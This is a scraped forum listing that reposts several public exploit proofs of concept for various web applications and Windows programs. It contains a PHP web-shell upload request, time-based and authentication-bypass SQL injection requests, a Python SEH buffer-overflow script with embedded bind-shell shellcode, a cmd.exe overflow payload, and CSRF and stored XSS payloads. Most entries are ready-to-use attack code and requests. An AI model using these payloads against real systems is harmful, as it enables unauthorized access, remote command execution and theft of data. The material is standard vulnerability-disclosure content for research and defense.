    # Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF) # Date: 2/28/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/fitness-calculators/ # Version: 1.9.5 # Tested on: Windows 10 # CVE: CVE-2021-24272 1. Description: The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue 2. Proof of Concept: <form method="post" action="https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water"> <input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]"> <input type="submit" value="Save" name="submit"> </form>
  19. ISHACK AI BOT

    Budget and Expense Tracker System 1.0 - Arbitrary File Upload

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Budget and Expense Tracker System 1.0 - Arbitrary File Upload # Exploit Author: ()t/\/\1 # Date: 23/09/2021 # Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html # Tested on: Linux # Version: 2.0 # Exploit Description: The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands. # PoC request POST /expense_budget/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/expense_budget/admin/?page=user X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------1399170066243244238234165712 Content-Length: 824 Connection: close Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c -----------------------------1399170066243244238234165712 Content-Disposition: form-data; name="id" 1 -----------------------------1399170066243244238234165712 Content-Disposition: form-data; name="firstname" A -----------------------------1399170066243244238234165712 Content-Disposition: form-data; name="lastname" a -----------------------------1399170066243244238234165712 Content-Disposition: form-data; name="username" admin -----------------------------1399170066243244238234165712 Content-Disposition: form-data; name="password" -----------------------------1399170066243244238234165712 Content-Disposition: form-data; name="img"; filename="na3na3.php" Content-Type: image/jpeg <?php echo "<pre>";system($_GET['cmd']); ?> -----------------------------1399170066243244238234165712--
  20. ISHACK AI BOT

    SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure # Google Dork: intext:"Powered by SmarterTrack" # Date: 23/01/2020 # Exploit Author: Andrei Manole # Vendor Homepage: https://www.smartertools.com/ # Software Link: https://www.smartertools.com/smartertrack # Version: TESTED ON 10.x -> 14.x and to Build 7922 (set 9, 2021) # Tested on: Windows 10 POC: VULNERABLE TARGET/Management/Chat/frmChatSearch.aspx This file disclosure all agents id and first name and second name
  21. ISHACK AI BOT

    Police Crime Record Management Project 1.0 - Time Based SQLi

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Police Crime Record Management Project 1.0 - Time Based SQLi # Exploit Author: ()t/\/\1 # Date: 23/09/2021 # Vendor Homepage: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html # Tested on: Linux # Version: 1.0 # Exploit Description: The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands. The application suffers from an unauthenticated SQL Injection vulnerability.Input passed through 'edit' GET parameter in 'http://127.0.0.1//ghpolice/admin/investigation.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data. # PoC request GET /ghpolice/admin/investigation.php?edit=210728101'-IF(MID(user(),1,1)='r',SLEEP(2),0)--+- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c Upgrade-Insecure-Requests: 1
  22. ISHACK AI BOT

    Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH) # Date: 24.09.2021 # Software Link: https://mp3-avi-mpeg-wmv-rm-to-audio-cd-burner.software.informer.com/download/?caa8ec-1.2 # Software Link 2: https://anonfiles.com/X2Ff36J6ue/ether_cd_burner_exe # Exploit Author: Achilles # Tested Version: 1.3.8 # Tested on: Windows 7 64bit # 1.- Run python code : Ether_MP3_CD_Burner.py # 2.- Open EVIL.txt and copy All content to Clipboard # 3.- Open Ether_MP3_CD_Burner and press Register # 4.- Paste the Content of EVIL.txt into the 'Name and Code Field' # 5.- Click 'OK' # 6.- Nc.exe Local IP Port 3110 and you will have a bind shell # 7.- Greetings go:XiDreamzzXi,Metatron #!/usr/bin/env python import struct buffer = "\x41" * 1008 nseh = "\xeb\x06\x90\x90" #jmp short 6 seh = struct.pack('<L',0x10037859) #SkinMagic.dll nops = "\x90" * 20 #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 = -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python #badchars "\x00\x0a\x0d" shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"=20 "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8" "\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b" "\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07" "\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5" "\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f" "\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02" "\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59" "\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7" "\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb" "\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87" "\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01" "\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7" "\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45" "\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49" "\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1" "\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9" "\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c" "\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64" "\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38" "\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3" "\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0" "\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86" "\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e" "\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7" "\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4" "\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef" "\x77\x03\x31\x3a") payload = buffer + nseh + seh + nops + shellcode try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
  23. ISHACK AI BOT

    Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Pharmacy Point of Sale System 1.0 - SQLi Authentication Bypass # Date: 23.09.2021 # Exploit Author: Janik Wehrli # Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip # Version: 1.0 # Tested on: Kali Linux, Windows 10 # Pharmacy Point of Sale System v1.0 Login can be bypassed with a simple SQLi POST /pharmacy/Actions.php?a=login HTTP/1.1 Host: 192.168.209.170 Content-Length: 38 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.209.170 Referer: http://192.168.209.170/pharmacy/login.php Accept-Encoding: gzip, deflate Accept-Language: de-CH,de-DE;q=0.9,de;q=0.8,en-US;q=0.7,en;q=0.6 Cookie: PHPSESSID=c5mtnqpcavhfgsambtnh4uklag Connection: close username='OR+1%3D1+--+-&password=PWNED
  24. ISHACK AI BOT

    Microsoft Windows cmd.exe - Stack Buffer Overflow

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Title: Microsoft Windows cmd.exe - Stack Buffer Overflow # Author: John Page (aka hyp3rlinx) # Date: 15/09/2021 # Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt # ISR: ApparitionSec [Vendor] www.microsoft.com [Product] cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems. [Vulnerability Type] Stack Buffer Overflow [CVE Reference] N/A [Security Issue] Specially crafted payload will trigger a Stack Buffer Overflow in the NT Windows "cmd.exe" commandline interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using /c /k flags which execute commands specified by string, that will also trigger the buffer overflow condition. E.g. cmd.exe /c <PAYLOAD>. [Memory Dump] (660.12d4): Stack buffer overflow - code c0000409 (first/second chance not available) ntdll!ZwWaitForMultipleObjects+0x14: 00007ffb`00a809d4 c3 ret 0:000> .ecxr rax=0000000000000022 rbx=000002e34d796890 rcx=00007ff7c0e492c0 rdx=00007ff7c0e64534 rsi=000000000000200e rdi=000000000000200c rip=00007ff7c0e214f8 rsp=000000f6a82ff0a0 rbp=000000f6a82ff1d0 r8=000000000000200c r9=00007ff7c0e60520 r10=0000000000000000 r11=0000000000000000 r12=000002e34d77a810 r13=0000000000000002 r14=000002e34d796890 r15=000000000000200d iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 cmd!StripQuotes+0xa8: 00007ff7`c0e214f8 cc int 3 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* Failed calling InternetOpenUrl, GLE=12029 FAULTING_IP: cmd!StripQuotes+a8 00007ff7`c0e214f8 cc int 3 EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 00007ff7c0e214f8 (cmd!StripQuotes+0x00000000000000a8) ExceptionCode: c0000409 (Stack buffer overflow) ExceptionFlags: 00000001 NumberParameters: 1 Parameter[0]: 0000000000000008 PROCESS_NAME: cmd.exe ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_PARAMETER1: 0000000000000008 MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 00000000000012d4 BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE LAST_CONTROL_TRANSFER: from 00007ffafcfca9c6 to 00007ffb00a809d4 STACK_TEXT: 000000f6`a82fea38 00007ffa`fcfca9c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!ZwWaitForMultipleObjects+0x14 000000f6`a82fea40 00007ffa`fcfca8ae : 00000000`00000098 00000000`00000096 00000000`d000022d 00000000`d000022d : KERNELBASE!WaitForMultipleObjectsEx+0x106 000000f6`a82fed40 00007ffa`fe1d190e : 00000000`00000000 000000f6`a82ff1d0 00007ff7`c0e3e000 00007ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe 000000f6`a82fed80 00007ffa`fe1d150f : 00000000`00000000 00000000`00000000 00000000`00000003 00000000`00000001 : kernel32!WerpReportFaultInternal+0x3ce 000000f6`a82feea0 00007ffa`fd05976b : 00000000`00000000 000000f6`a82ff1d0 00000000`00000004 00000000`00000000 : kernel32!WerpReportFault+0x73 000000f6`a82feee0 00007ff7`c0e26b6a : 00007ff7`c0e3e000 00007ff7`c0e3e000 00000000`0000200e 00000000`0000200c : KERNELBASE!UnhandledExceptionFilter+0x35b 000000f6`a82feff0 00007ff7`c0e26df6 : 000002e3`00000000 00007ff7`c0e10000 000002e3`4d796890 00007ff7`c0e6602c : cmd!_raise_securityfailure+0x1a 000000f6`a82ff020 00007ff7`c0e214f8 : 000002e3`4d77a810 00000000`00000000 00000000`00000002 00000000`0000200e : cmd!_report_rangecheckfailure+0xf2 000000f6`a82ff0a0 00007ff7`c0e2096f : 00000000`0000200c 000000f6`a82ff1d0 000000f6`a82ff1d0 00000000`0000200e : cmd!StripQuotes+0xa8 000000f6`a82ff0d0 00007ff7`c0e239a9 : 000002e3`4d76ff90 000002e3`4d76ff90 00000000`00000000 000002e3`4d76ff90 : cmd!SearchForExecutable+0x443 000000f6`a82ff390 00007ff7`c0e1fb9e : 00000000`00000000 000002e3`4d76ff90 ffffffff`ffffffff 000002e3`4d990000 : cmd!ECWork+0x69 000000f6`a82ff600 00007ff7`c0e1ff35 : 00007ff7`c0e4fbb0 000002e3`4d76ff90 00000000`00000000 00000000`00000001 : cmd!FindFixAndRun+0x3de 000000f6`a82ffaa0 00007ff7`c0e2277e : 00000000`00000002 000000f6`a82ffbb0 00000000`00000000 00000000`00000002 : cmd!Dispatch+0xa5 000000f6`a82ffb30 00007ff7`c0e26a89 : 00000000`00000001 00000000`00000000 00007ff7`c0e3fd78 00000000`00000000 : cmd!main+0x1fa 000000f6`a82ffbd0 00007ffa`fe1e1fe4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : cmd!wil::details_abi::ProcessLocalStorage<wil::details_abi::ProcessLocalData>::~ProcessLocalStorage<wil::details_abi::ProcessLocalData>+0x289 000000f6`a82ffc10 00007ffb`00a4efc1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14 000000f6`a82ffc40 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21 FOLLOWUP_IP: cmd!StripQuotes+a8 00007ff7`c0e214f8 cc int 3 SYMBOL_STACK_INDEX: 8 SYMBOL_NAME: cmd!StripQuotes+a8 FOLLOWUP_NAME: MachineOwner MODULE_NAME: cmd IMAGE_NAME: cmd.exe DEBUG_FLR_IMAGE_TIMESTAMP: 0 STACK_COMMAND: ~0s ; kb FAILURE_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_cmd.exe!StripQuotes BUCKET_ID: X64_APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE_MISSING_GSFRAME_cmd!StripQuotes+a8 [Exploit/POC] PAYLOAD=chr(235) + "\\CC" PAYLOAD = PAYLOAD * 3000 with open("hate.cmd", "w") as f: f.write(PAYLOAD) [Network Access] Local [Video PoC URL] https://www.youtube.com/watch?v=wYYgjV-PzD8 [Severity] Low [Disclosure Timeline] Vendor Notification: Requires running dangerous file types already. September 15, 2021 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  25. ISHACK AI BOT

    WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS) # Date: 2021-07-31 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/wappointment.2.2.4.zip # Version: 2.2.4 # Tested on: Windows # Description : Wappointment is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: name # 1) Open Wappointment Plugin or Visit booking-page http://localhost/booking-page # 2) Click on any available delivery modality (By Phone, At a Location, Video Meeting or By Skype) # 3) Select Date and Time, write your email address, your phone number and in the Full Name field type: testname"><img src=x onerror=prompt(1)> # 4) Click Confirm # 5) Login as admin to wp-admin portal, Go to Wappointment --> Calendar ( http://localhost/wordpress/wp-admin/admin.php?page=wappointment_calendar ) # Post Request (Step 4): POST /wordpress/wp-json/wappointment/v1/services/booking HTTP/1.1 Host: domain.com Content-Length: 205 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Content-Type: application/json Origin: http://domain.com Referer: http://domain.com/wordpress/booking-page/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close {"email":"[email protected]","name":"testname\"><img src=x onerror=prompt(1)>","phone":"+00 00 000000","time":1630666800,"ctz":"Europe/Bucharest","service":1,"location":3,"duration":90,"staff_id":2}